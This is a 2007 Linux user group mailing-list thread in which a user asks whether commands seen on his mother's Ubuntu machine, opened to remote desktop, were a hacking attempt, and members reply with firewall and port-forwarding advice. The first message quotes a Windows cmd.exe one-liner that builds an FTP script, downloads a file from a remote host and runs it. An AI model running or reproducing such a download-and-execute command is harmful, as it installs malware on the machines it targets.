[Dclug] Whats happening here? Is this a hacking attempt?

Mackenzie Morgan macoafi at gmail.com
Sat Mar 31 01:33:34 EDT 2007 

I've heard as low as 8 minutes for a Windows computer to be compromised.

On 3/30/07, Mike Vore <mike at vorefamily.net> wrote:
>
> Arun Mallikarjunan wrote:
> > Hi again,
> >     I had mentioned before that my moms(she lives in Chennai, India)
> > using Ubuntu edgy for about 8 months now without any issues. Last week
> > she wanted me to show her how to rip music off of the CD's !!. I asked
> > to enable remote desktop and showed her how to use the extractor. Well,
> > the next she came online and told me that somebody was trying to take
> > control of her computer. I told her that thats not possible. then she
> > sent me this piece of code
> >
> > run %systemroot%\system32\cmd.exe
> >
> > cmd /c echo open oki 21 >> ik &echo user u2m6g k3bmt >> ik &echo binary
> >  >> ik &echo get asd >> ik &echo bye >>w ikh &fotp -n -v -s:ik &diels ik
> > &asd &exit
> >
> >
> > I was a little surprised at seeing these messages. They are certainly
> > related to windows which she doesnt use and I dont either.
> >
> > The next day when she came online she said that 82.212.50.201
> > <http://82.212.50.201> was trying to take control and 5 minutes later
> > she said 221.169.189.177 <http://221.169.189.177> was. I looked these IP
> > http://www.ip-adress.com/ and they seem to be coming from germany and
> > taiwan. I made her turn off the remote desktop and she hasnt seen it
> since.
> >
> > Here are my Q's:
> >
> > 1. How did they find her?
>
> They may not be attacking 'her', just an IP address.
>
> > 2. she doesnt leave the comp on. how are they finding her. She does have
> > addns script which updates dyndns.org <http://dyndns.org>. if thats the
> > case how did they find out her dyndns name.
>
> Same answer. I once setup a school on their T1 Class-C (24bit) network. I
> then
> watched the input to the firewall - within just minutes of going on the
> net
> there were about a dozen port-scans on each of the addresses in the
> class-C
> range. Anyone with nmap can start an address or port scan on just about
> any IP
> range.
>
> > 3. What can I do to check if they have gotten in?
>
> It would probably take more time to check than to wipe the disk clean and
> re-install
>
> > 4. What to do to stop them from getting in? I am going to install a
> > firewall, any particular one in mind? The problem is that I have to
> > install it and then I have to instruct her to open ports which is why it
> > needs to be simple enough for her to understand.
>
> Install a Firewall IMMEDIATELY. Unless/Until she needs to act as a server
> there is almost no need for opening any port for inbound traffic. But if
> she
> does need something like SSH to access from her office, put it on a high
> port,
> and have the firewall not only do NAT but Port Forwarding.  For instance I
> have my inbound SSH on port XXXX and have the Firewall/Router translate it
> to
> my 'big iron' on port 22.  Also setup incoming filtering to only allow
> your IP
> number (if you have a fixed one) or you ISP's subnet, for example if you
> are
> using Verizon FiOS you may find that you are using numbers in the
> 71.245.xxx.yyy range. setting the filter to 71.245/16 won't stop everyone,
> but
> it will keep anyone not on Verizon's net out. Set up all incoming services
> that you need - like remote desktop to use high numbers and do Port
> Forwarding
> - not a lot of help but it will keep someone from using default settings.
>
> When I started using FiOS and allowed port 22 (SSH) through I had many
> connect
> attempts, but none after I use the high port number with Port-Forwarding.
>
> NEVER put any unprotected computer directly on the net.  I think the time
> for
> a virgin windows system to become compromised is now under 20 minutes.
>
> That's my take on the situation, YMMV. Others may
>
>
>
> --
> Mike Vore
>     http://www.OhMyWoodness.com
>     http://mike.vorefamily.net/twr
> _______________________________________________
> Dclug mailing list
> Dclug at calypso.tux.org
> http://calypso.tux.org/cgi-bin/mailman/listinfo/dclug
>



-- 
Mackenzie Morgan
Linux User # 432169
Hey, type this in the terminal!  It's really fun!
apt-get moo
then try
aptitude moo
and
aptitude -v moo
just keep adding v's to that and watch it change
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://calypso.tux.org/pipermail/dclug/attachments/20070331/615c07f1/attachment-0003.html

More information about the Dclug mailing list